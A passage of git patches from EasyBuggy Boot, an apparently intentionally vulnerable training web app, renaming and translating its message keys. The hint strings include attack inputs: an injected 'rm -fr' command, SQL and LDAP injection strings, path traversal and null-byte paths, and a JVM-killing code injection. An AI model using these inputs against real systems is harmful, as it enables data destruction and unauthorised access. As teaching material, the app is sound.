or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From d9b156d9e1608d400f4278da5ea2e5d7b3c3752b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:47 +0900 Subject: [PATCH 019/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From 55deb6216662eeae3957ad3eab6f9fa8fb22a889 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:49 +0900 Subject: [PATCH 020/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From 3f0df114f7f990354868d1e01a70a1f1ec677554 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:51 +0900 Subject: [PATCH 021/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From 7dc89d5fe3043bf333839f6b587282e965dbabd0 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:52 +0900 Subject: [PATCH 022/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 7126ec2..92cf1d5 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\ title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=\u30c7\u30b6\u30a4\u30f3\u30c6\u30b9\u30c8 +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=\u8a73\u7d30\u306f\u6b21\u306e\u30da\u30fc\u30b8\u3092\u53c2\u7167\u4e0b\u3055\u3044\: http\://getbootstrap.com/ From 57ef55aa84e18c1a78d006e345e58bde711dae1b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:54 +0900 Subject: [PATCH 023/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From 4611f2d9a897ff37f7876af42a3ad4bd954ec060 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:55 +0900 Subject: [PATCH 024/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From a899cacd319ce524681cd07bcd9a25aa28c10f76 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:57 +0900 Subject: [PATCH 025/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From 4814d7aee1ac35ea71af55b8b2a7a9d3ec2564ca Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 16:00:59 +0900 Subject: [PATCH 026/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index c4aa227..d02e954 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -303,7 +303,7 @@ msg.warn.enter.name.and.passwd=Please enter your name and password. title.clickjacking.page=Change Your Mail title.csrf.page=Change Your Password title.clientinfo.page=Client Information -section.design.test=Design Test +title.design.test.page=Design Test title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ From f44e0df7f5108d27446c4105eecae5118c3992a1 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 18:15:43 +0900 Subject: [PATCH 027/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 110 +++++++++++----------- 1 file changed, 55 insertions(+), 55 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 92cf1d5..f14cbf1 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b msg.batch.registration.fail=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332\u304c\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.batch.update.complete=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0\u304c\u5b8c\u4e86\u3057\u307e\u3057\u305f\u3002 msg.batch.update.fail=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0\u304c\u5931\u6557\u3057\u307e\u3057\u305f\u3002 -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001C\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 msg.calc.sym.natural.numbers=n\u4ee5\u4e0b\u306e\u81ea\u7136\u6570\u3059\u3079\u3066\u306e\u7dcf\u548c (1 + 2 + 3 + \u2026 + n) \u3092\u8a08\u7b97\u3057\u307e\u3059\u3002 msg.cant.create.batch=\u30d0\u30c3\u30c1\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u3002 msg.convert.grayscale=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 @@ -228,43 +228,43 @@ msg.enter.id.and.password=\u30e6\u30fc\u30b6\u30fcID\u3068\u30d1\u30b9\u30ef\u30 msg.enter.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.error.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u306a\u3044\u304b\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 msg.executed.batch=\u30d0\u30c3\u30c1\u3092\u4f5c\u6210\u3001\u5b9f\u884c\u3057\u307e\u3057\u305f\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.info.jvm.not.crash=JVM\u30af\u30e9\u30c3\u30b7\u30e5\u306f\u3001Oracle JDK 6\u307e\u305f\u306f7\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002 msg.invalid.expression=\u4e0d\u6b63\u306a\u6570\u5f0f\u3067\u3059 \: {0} msg.invalid.json=\u4e0d\u6b63\u306aJSON\u6587\u5b57\u5217\u3067\u3059 \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001Java\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002\n\u753b\u9762\u3092\u30ed\u30fc\u30c9\u3057\u7d9a\u3051\u308b\u3068\u3001\u6700\u7d42\u7684\u306bOutOfMemoryError\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 msg.low.alphnum8=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u306e\u82f1\u6570\u5b57\u3067\u3059\u3002 msg.need.admin.privilege=\u3053\u3053\u304b\u3089\u5148\u306f\u7ba1\u7406\u8005\u6a29\u9650\u304c\u5fc5\u8981\u3067\u3059\u3002 msg.note.brute.force=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30ed\u30b0\u30a4\u30f3\u8a66\u884c\u56de\u6570\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001\u30d6\u30eb\u30fc\u30c8\u30d5\u30a9\u30fc\u30b9\u653b\u6483\u304c\u53ef\u80fd\u3067\u3059\u3002 msg.note.clickjacking=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 -msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection={}');java.lang.System.exit(0);//\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3067 JavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 msg.note.csrf=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 msg.note.dangerous.file.inclusion=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=[\u60aa\u610f\u306e\u3042\u308bJSP\u30d5\u30a1\u30a4\u30eb\u304c\u30c7\u30d7\u30ed\u30a4\u3055\u308c\u305fURL]\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002 msg.note.db.connection.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 -msg.note.deadlock=Deadlock occurs after continuously loading this page few times. -msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=\u3053\u306e\u30da\u30fc\u30b8\u3092\u9023\u7d9a\u3067\u6570\u56de\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.endlesswaiting=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5b8c\u4e86\u3057\u306a\u3044\u30d7\u30ed\u30bb\u30b9\u306e\u5f85\u6a5f\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.createobjects=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 +msg.note.roundofferror=1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e38\u3081\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.lossoftrailingdigits=0.0000000000000001\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u60c5\u5831\u6b20\u843d\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.commandinjection=@Runtime@getRuntime().exec('rm -fr /your-important-dir/')\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u91cd\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u524a\u9664\u3055\u308c\u307e\u3059\u3002 msg.note.not.use.ext.db=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u306f\u3001MySQL\u306a\u3069\u306e\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306f\u3001application.properties\u3092\u7de8\u96c6\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.note.path.traversal=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=../uid/adminpassword.txt?\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u3053\u306e\u30da\u30fc\u30b8\u306badminpassword.txt\u306e\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=63\u4ee5\u4e0a\u306e\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.session.fixation=admin\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30ed\u30b0\u30a4\u30f3\u3067\u304d\u307e\u3059\u3002\n\u3053\u306e\u30da\u30fc\u30b8\u3067\u306fCookie\u3092\u6271\u3048\u306a\u3044\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u3092\u30b5\u30dd\u30fc\u30c8\u3059\u308b\u76ee\u7684\u3067URL\u30ea\u30e9\u30a4\u30c8\u304c\u6a5f\u80fd\u3057\u307e\u3059\u3002\u305d\u308c\u306b\u3088\u308a\u3001\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u304c\u53ef\u80fd\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002 -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=\u6587\u5b57\u5217\u306baaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u69cb\u6587\u89e3\u6790\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002
\n \u6587\u5b57\u5217\u306baaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u5fdc\u7b54\u304c\u8fd4\u3089\u306a\u304f\u306a\u308a\u307e\u3059\u3002 +msg.note.strplusopr=+(\u30d7\u30e9\u30b9)\u6f14\u7b97\u5b50\u3067\u6587\u5b57\u5217\u3092\u9023\u7d50\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u751f\u6210\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002 +msg.note.deadlock2=2\u3064\u306e\u30a6\u30a4\u30f3\u30c9\u30a6\u307e\u305f\u306f\u30bf\u30d6\u3092\u958b\u304d\u3001\u4e00\u65b9\u3067\u30e6\u30fc\u30b6\u30fcID\u3092\u964d\u9806\u306b\u30bd\u30fc\u30c8\u3057\u3066\u300c\u66f4\u65b0\u300d\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3057\u305f\u76f4\u5f8c\u306b\u3001\u3082\u3046\u4e00\u65b9\u3067\u6607\u9806\u306e\u307e\u307e\n\u300c\u66f4\u65b0\u300d\u30dc\u30bf\u30f3\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u3067\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.sqlijc=Mark\u3068password\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6697\u8a3c\u756a\u53f7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002\n\u30d1\u30b9\u30ef\u30fc\u30c9\u306b' OR '1'\='1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4ed6\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u60c5\u5831\u304c\u8868\u793a\u3067\u304d\u307e\u3059\u3002 